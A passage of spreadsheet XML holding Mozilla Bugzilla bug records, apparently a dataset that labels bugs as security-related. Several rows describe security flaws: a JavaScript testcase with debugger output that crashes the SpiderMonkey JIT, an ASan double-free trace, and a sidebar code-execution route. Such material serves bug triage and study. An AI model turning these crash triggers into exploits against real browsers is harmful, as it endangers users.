Most of the work of writing this patch was in figuring out the meaning of the savedEnd field, so I tried to improve the comment describing it. Let me know if you have any ideas for this.
I don't understand precisely how the JIT uses this information, so I decided to be conservative and close the bug.</t>
        </is>
      </c>
      <c r="X1314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" t="n">
        <v>1514682</v>
      </c>
      <c r="B1315" t="inlineStr">
        <is>
          <t>2018-12-17 01:02:36 -0800</t>
        </is>
      </c>
      <c r="C1315" t="inlineStr">
        <is>
          <t>Assertion failure: obj-&gt;is&lt;PlainObject&gt;(), at /builds/worker/workspace/build/src/js/src/jit/CacheIR.cpp:4626</t>
        </is>
      </c>
      <c r="D1315" t="inlineStr">
        <is>
          <t>2024-05-30 09:50:32 -0700</t>
        </is>
      </c>
      <c r="E1315" t="n">
        <v>1</v>
      </c>
      <c r="F1315" t="n">
        <v>1</v>
      </c>
      <c r="G1315" t="n">
        <v>3</v>
      </c>
      <c r="H1315" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1315" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1315" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1315" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L1315" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1315" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1315" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1315" t="inlineStr">
        <is>
          <t>[jsbugmon:update,origRev=edf1f05e9d00,testComment=2][post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q1315" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1315" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1315" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T1315" t="n">
        <v>1</v>
      </c>
      <c r="U1315" t="n">
        <v>0</v>
      </c>
      <c r="V1315" t="n">
        <v>25</v>
      </c>
      <c r="W1315" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest debug build of the jsshell. It requires the --ion-eager flag.
Testcase:
o0=(class Cl26349 extends ReferenceError{ set stack (x) {super.stack=fun0()}});
o1=new o0(o0,null);
o0.__proto__=o1.__proto__;
o26=[1.1,2.2,3.3];
o26.__proto__=o0.__proto__;
o39=[1.1,2.2,3.3];
o26['stack']={};
function fun0() {
        o26.__proto__=o39.__proto__;
        return 0xdead;
}
Debugger output:
lldb-4.0 -- ./build/js --ion-eager bug.js
(lldb) target create "./build/js"
Current executable set to './build/js' (x86_64).
(lldb) settings set -- target.run-args  "--ion-eager" "bug.js"
(lldb) r
Process 18223 launched: './build/js' (x86_64)
Assertion failure: obj-&gt;is&lt;PlainObject&gt;(), at /builds/worker/workspace/build/src/js/src/jit/CacheIR.cpp:4626
Process 18223 stopped
* thread #1, name = 'js', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
    frame #0: 0x00005555561bd340 js`js::jit::SetPropIRGenerator::tryAttachAddSlotStub(JS::Handle&lt;js::ObjectGroup*&gt;, JS::Handle&lt;js::Shape*&gt;) + 4800
js`js::jit::SetPropIRGenerator::tryAttachAddSlotStub:
-&gt;  0x5555561bd340 &lt;+4800&gt;: movl   $0x1212, 0x0              ; imm = 0x1212
    0x5555561bd34b &lt;+4811&gt;: callq  0x5555557655f2            ; abort
    0x5555561bd350 &lt;+4816&gt;: leaq   0x7f4676(%rip), %rdi      ;  + 10701
    0x5555561bd357 &lt;+4823&gt;: leaq   0x7f467d(%rip), %rsi      ;  + 10715
(lldb) bt 16
* thread #1, name = 'js', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
  * frame #0: 0x00005555561bd340 js`js::jit::SetPropIRGenerator::tryAttachAddSlotStub(JS::Handle&lt;js::ObjectGroup*&gt;, JS::Handle&lt;js::Shape*&gt;) + 4800
    frame #1: 0x000055555609e9a2 js`js::jit::DoSetPropFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICSetProp_Fallback*, JS::Value*, JS::Handle&lt;JS::Value&gt;, J                                                                                        S::Handle&lt;JS::Value&gt;) + 2738
    frame #2: 0x000025b6efb8e9f5
    frame #3: 0x000025b6efb7cac4
    frame #4: 0x000055555632c914 js`js::jit::MaybeEnterJit(JSContext*, js::RunState&amp;) + 1636
    frame #5: 0x00005555557e2ac7 js`js::RunScript(JSContext*, js::RunState&amp;) + 535
    frame #6: 0x00005555557f7d75 js`js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) + 1077
    frame #7: 0x00005555557f837d js`js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) + 621
    frame #8: 0x000055555591fa96 js`ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) + 294
    frame #9: 0x000055555591fc06 js`JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) + 150
    frame #10: 0x00005555557422d9 js`RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool) + 521
    frame #11: 0x000055555574165f js`Process(JSContext*, char const*, bool, FileKind) + 2463
    frame #12: 0x00005555556f9ed0 js`main + 17552
    frame #13: 0x00007ffff6af81c1 libc.so.6`__libc_start_main + 241
    frame #14: 0x00005555556f0f55 js`_start + 41</t>
        </is>
      </c>
      <c r="X1315" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" t="n">
        <v>633243</v>
      </c>
      <c r="B1316" t="inlineStr">
        <is>
          <t>2011-02-10 09:56:00 -0800</t>
        </is>
      </c>
      <c r="C1316" t="inlineStr">
        <is>
          <t>Cannot add two libraries with same name but different authors</t>
        </is>
      </c>
      <c r="D1316" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E1316" t="n">
        <v>1</v>
      </c>
      <c r="F1316" t="n">
        <v>1</v>
      </c>
      <c r="G1316" t="n">
        <v>6</v>
      </c>
      <c r="H1316" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1316" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1316" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K1316" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1316" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1316" t="inlineStr"/>
      <c r="Q1316" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1316" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1316" t="inlineStr">
        <is>
          <t>6.0.10</t>
        </is>
      </c>
      <c r="T1316" t="n">
        <v>1</v>
      </c>
      <c r="U1316" t="n">
        <v>0</v>
      </c>
      <c r="V1316" t="n">
        <v>2</v>
      </c>
      <c r="W1316" t="inlineStr">
        <is>
          <t>STR:
1. Click on create library.
2. In the plugins, click on the + sign to add a library.
3. Type "My Library". It will give you a list of them. Select the one which says "My library by zaloon". This will be added.
4. Then again try to add a new library(same as step 3) and this time when you type My library, select "My library by dandonkulous".
Actual Result:
You get a message - you addon already depends on My library by dandonkulous.
Expected result:
I should be able to add the library</t>
        </is>
      </c>
      <c r="X1316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" t="n">
        <v>294074</v>
      </c>
      <c r="B1317" t="inlineStr">
        <is>
          <t>2005-05-13 13:40:53 -0700</t>
        </is>
      </c>
      <c r="C1317" t="inlineStr">
        <is>
          <t>arbitrary code execution via sidebar (part 3)</t>
        </is>
      </c>
      <c r="D1317" t="inlineStr">
        <is>
          <t>2011-08-05 22:29:38 -0700</t>
        </is>
      </c>
      <c r="E1317" t="n">
        <v>1</v>
      </c>
      <c r="F1317" t="n">
        <v>1</v>
      </c>
      <c r="G1317" t="n">
        <v>2</v>
      </c>
      <c r="H1317" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1317" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1317" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1317" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1317" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1317" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1317" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q1317" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1317" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1317" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1317" t="n">
        <v>1</v>
      </c>
      <c r="U1317" t="n">
        <v>0</v>
      </c>
      <c r="V1317" t="n">
        <v>13</v>
      </c>
      <c r="W1317" t="inlineStr">
        <is>
          <t>My bug 284627 has not been fully fixed. "data:" url check is missing. Augh.
Then, bug 226548 becomes a problem. Links on the sidebar panel send wrong
referer. This could be used for cross-site scripting.
If you are on about:config or chrome url, referer is set to that privileged
content, not to the sidebar panel itself. This allows an attacker to execute
arbitrary code.</t>
        </is>
      </c>
      <c r="X1317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" t="n">
        <v>623904</v>
      </c>
      <c r="B1318" t="inlineStr">
        <is>
          <t>2011-01-07 07:11:30 -0800</t>
        </is>
      </c>
      <c r="C1318" t="inlineStr">
        <is>
          <t>Update questions app to new theme</t>
        </is>
      </c>
      <c r="D1318" t="inlineStr">
        <is>
          <t>2011-02-09 16:12:14 -0800</t>
        </is>
      </c>
      <c r="E1318" t="n">
        <v>1</v>
      </c>
      <c r="F1318" t="n">
        <v>1</v>
      </c>
      <c r="G1318" t="n">
        <v>5</v>
      </c>
      <c r="H1318" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1318" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1318" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1318" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1318" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1318" t="inlineStr"/>
      <c r="Q1318" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1318" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1318" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T1318" t="n">
        <v>1</v>
      </c>
      <c r="U1318" t="n">
        <v>0</v>
      </c>
      <c r="V1318" t="n">
        <v>12</v>
      </c>
      <c r="W1318" t="inlineStr">
        <is>
          <t>The questions app needs updating to blend in better with the new theme on the rest of SUMO. To get there, we are going to need some direction from UX (chowse?).</t>
        </is>
      </c>
      <c r="X1318" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" t="n">
        <v>761655</v>
      </c>
      <c r="B1319" t="inlineStr">
        <is>
          <t>2012-06-05 09:26:40 -0700</t>
        </is>
      </c>
      <c r="C1319" t="inlineStr">
        <is>
          <t>Firefox ignores X-Frame-Options when set to SAMEORIGIN, SAMEORIGIN (duplicated header)</t>
        </is>
      </c>
      <c r="D1319" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1319" t="n">
        <v>1</v>
      </c>
      <c r="F1319" t="n">
        <v>1</v>
      </c>
      <c r="G1319" t="n">
        <v>3</v>
      </c>
      <c r="H1319" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1319" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1319" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1319" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L1319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1319" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q1319" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1319" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1319" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T1319" t="n">
        <v>1</v>
      </c>
      <c r="U1319" t="n">
        <v>0</v>
      </c>
      <c r="V1319" t="n">
        <v>22</v>
      </c>
      <c r="W1319" t="inlineStr">
        <is>
          <t>Firefox ignores the "X-Frame-Options: SAMEORIGIN, SAMEORIGIN" header when the SAMEORIGIN value is duplicated. Some websites incorrectly have this duplicated header for some unknown reasons, see e.g. bug 761046.
It would probably be fine to change the way nsDSURIContentListener::CheckFrameOptions parses this header to accept duplicated headers.</t>
        </is>
      </c>
      <c r="X1319" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" t="n">
        <v>243109</v>
      </c>
      <c r="B1320" t="inlineStr">
        <is>
          <t>2004-05-09 12:41:54 -0700</t>
        </is>
      </c>
      <c r="C1320" t="inlineStr">
        <is>
          <t>cleanup business of internal vs. external definition of nsAString</t>
        </is>
      </c>
      <c r="D1320" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E1320" t="n">
        <v>1</v>
      </c>
      <c r="F1320" t="n">
        <v>1</v>
      </c>
      <c r="G1320" t="n">
        <v>3</v>
      </c>
      <c r="H1320" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1320" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1320" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1320" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1320" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1320" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1320" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1320" t="inlineStr"/>
      <c r="Q1320" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1320" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1320" t="inlineStr">
        <is>
          <t>mozilla1.8beta3</t>
        </is>
      </c>
      <c r="T1320" t="n">
        <v>1</v>
      </c>
      <c r="U1320" t="n">
        <v>0</v>
      </c>
      <c r="V1320" t="n">
        <v>6</v>
      </c>
      <c r="W1320" t="inlineStr">
        <is>
          <t>cleanup business of internal vs. external definition of nsAString
see bug 205425 comment 67 through bug 205425 comment 74.</t>
        </is>
      </c>
      <c r="X1320" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" t="n">
        <v>1290244</v>
      </c>
      <c r="B1321" t="inlineStr">
        <is>
          <t>2016-07-28 13:27:39 -0700</t>
        </is>
      </c>
      <c r="C1321" t="inlineStr">
        <is>
          <t>Crash: double-free [@xcb_render_create_picture]</t>
        </is>
      </c>
      <c r="D1321" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:08 -0800</t>
        </is>
      </c>
      <c r="E1321" t="n">
        <v>1</v>
      </c>
      <c r="F1321" t="n">
        <v>1</v>
      </c>
      <c r="G1321" t="n">
        <v>3</v>
      </c>
      <c r="H1321" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1321" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1321" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K1321" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1321" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1321" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1321" t="inlineStr">
        <is>
          <t>[adv-main49+]</t>
        </is>
      </c>
      <c r="Q1321" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1321" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1321" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1321" t="n">
        <v>1</v>
      </c>
      <c r="U1321" t="n">
        <v>0</v>
      </c>
      <c r="V1321" t="n">
        <v>22</v>
      </c>
      <c r="W1321" t="inlineStr">
        <is>
          <t>The following testcase crashes on en-us.linux-x86_64-asan.tar.bz2 revision 1d26ac38f26ded12a7ca0fb56a67db5eef8f2c20
See attachment.
Backtrace:
==14239==ERROR: AddressSanitizer: attempting double-free on 0x603000f08e90 in thread T0:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x7f57c579d017 in xcb_render_create_picture (/usr/lib/x86_64-linux-gnu/libcairo.so.2+0x14017)
0x603000f08e90 is located 0 bytes inside of 24-byte region [0x603000f08e90,0x603000f08ea8)
freed by thread T40 (Compositor) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f57c57f34ac  (/usr/lib/x86_64-linux-gnu/libcairo.so.2+0x6a4ac)
previously allocated by thread T40 (Compositor) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x7f57c579d017 in xcb_render_create_picture (/usr/lib/x86_64-linux-gnu/libcairo.so.2+0x14017)
Thread T40 (Compositor) created by T0 here:
    #0 0x49a839 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f57b2ab4a1b in CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/platform_thread_posix.cc:137:14
    #2 0x7f57b2ab4a1b in Create /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/platform_thread_posix.cc:148
    #3 0x7f57b2ab4a1b in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/thread.cc:98
    #4 0x7f57b41fc5b8 in CreateCompositorThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ipc/CompositorThread.cpp:105:8
    #5 0x7f57b41fc5b8 in mozilla::layers::CompositorThreadHolder::CompositorThreadHolder() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ipc/CompositorThread.cpp:53
    #6 0x7f57b41fc70a in mozilla::layers::CompositorThreadHolder::Start() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ipc/CompositorThread.cpp:121:33
    #7 0x7f57b430e002 in InitLayersIPC /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:882:9
    #8 0x7f57b430e002 in gfxPlatform::Init() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:680
    #9 0x7f57b430b7a2 in gfxPlatform::GetPlatform() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/thebes/gfxPlatform.cpp:515:9
    #10 0x7f57b8b5562d in CreateVsyncRefreshTimer /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsRefreshDriver.cpp:861:5
    #11 0x7f57b8b5562d in nsRefreshDriver::ChooseTimer() const /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsRefreshDriver.cpp:996
    #12 0x7f57b8b5861a in nsRefreshDriver::EnsureTimerStarted(nsRefreshDriver::EnsureTimerStartedFlags) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1213:34
    #13 0x7f57b8e31c26 in PresShell::ScheduleViewManagerFlush(nsIPresShell::PaintType) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsPresShell.cpp:3663:5
    #14 0x7f57b8fa535c in nsIFrame::SchedulePaint(nsIFrame::PaintType) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/generic/nsFrame.cpp:5710:3
    #15 0x7f57b8fa3c75 in InvalidateFrameInternal(nsIFrame*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/generic/nsFrame.cpp:5500:5
    #16 0x7f57b8f32f18 in nsIFrame::InvalidateFrameSubtree(unsigned int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/generic/nsFrame.cpp:5513:3
    #17 0x7f57b8c7fac7 in InvalidateCanvasIfNeeded /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:8508:3
    #18 0x7f57b8c7fac7 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:7656
    #19 0x7f57b8e1cd67 in PresShell::Initialize(int, int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/layout/base/nsPresShell.cpp:1726:7
    #20 0x7f57b496d841 in nsContentSink::StartLayout(bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/base/nsContentSink.cpp:1210:19
    #21 0x7f57b3d09736 in nsHtml5TreeOpExecutor::StartLayout() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:612:3
    #22 0x7f57b3d15e8e in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOperation.cpp:990:7
    #23 0x7f57b3d07087 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:448:21
    #24 0x7f57b3d0bb1b in nsHtml5ExecutorFlusher::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #25 0x7f57b1d57ec6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:1068:7
    #26 0x7f57b1dd626c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #27 0x7f57b2b228af in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #28 0x7f57b2a970e8 in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #29 0x7f57b2a970e8 in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:225
    #30 0x7f57b2a970e8 in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:205
    #31 0x7f57b84dd88f in nsBaseAppShell::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #32 0x7f57ba40e321 in nsAppStartup::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:284:19
    #33 0x7f57ba55b873 in XREMain::XRE_mainRun() /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4213:10
    #34 0x7f57ba55ce13 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4332:8
    #35 0x7f57ba55dcea in XRE_main /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsAppRunner.cpp:4423:16
    #36 0x4dfb47 in do_main /builds/slave/m-in-l64-asan-0000000000000000/build/src/browser/app/nsBrowserApp.cpp:251:10
    #37 0x4dfb47 in main /builds/slave/m-in-l64-asan-0000000000000000/build/src/browser/app/nsBrowserApp.cpp:387
    #38 0x7f57cb407ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: double-free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3 in realloc</t>
        </is>
      </c>
      <c r="X1321" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1322">
      <c r="A1322" t="n">
        <v>179329</v>
      </c>
      <c r="B1322" t="inlineStr">
        <is>
          <t>2002-11-09 20:56:57 -0800</t>
        </is>
      </c>
      <c r="C1322" t="inlineStr">
        <is>
          <t>HTML-unsafe characters need to be escaped in quips</t>
        </is>
      </c>
      <c r="D1322" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E1322" t="n">
        <v>1</v>
      </c>
      <c r="F1322" t="n">
        <v>1</v>
      </c>
      <c r="G1322" t="n">
        <v>4</v>
      </c>
      <c r="H1322" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1322" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1322" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1322" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1322" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1322" t="inlineStr"/>
      <c r="Q1322" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1322" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1322" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1322" t="n">
        <v>1</v>
      </c>
      <c r="U1322" t="n">
        <v>0</v>
      </c>
      <c r="V1322" t="n">
        <v>8</v>
      </c>
      <c r="W1322" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.2b) Gecko/20021108
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.2b) Gecko/20021108
Somebody included &lt;i&gt; in a quip on this page so the second half of the page is
italicized.
Reproducible: Always
Steps to Reproduce:
1. Look at the sample page code/rendering.
Actual Results:  
The bracket characters are not escaped.
Expected Results:  
The bracket characters need to be escaped.
This is a potential security issue since somebody could add some unauthorized
javascript.  I am making this critical for that reason.</t>
        </is>
      </c>
      <c r="X1322" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1323">
      <c r="A1323" t="n">
        <v>1757604</v>
      </c>
      <c r="B1323" t="inlineStr">
        <is>
          <t>2022-03-01 09:44:18 -0800</t>
        </is>
      </c>
      <c r="C1323" t="inlineStr">
        <is>
          <t>Stylesheet's CSP bypass via reflected URL in chrome:// directories still broken</t>
        </is>
      </c>
      <c r="D1323" t="inlineStr">
        <is>
          <t>2023-01-16 20:28:03 -0800</t>
        </is>
      </c>
      <c r="E1323" t="n">
        <v>1</v>
      </c>
      <c r="F1323" t="n">
        <v>1</v>
      </c>
      <c r="G1323" t="n">
        <v>3</v>
      </c>
      <c r="H1323" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
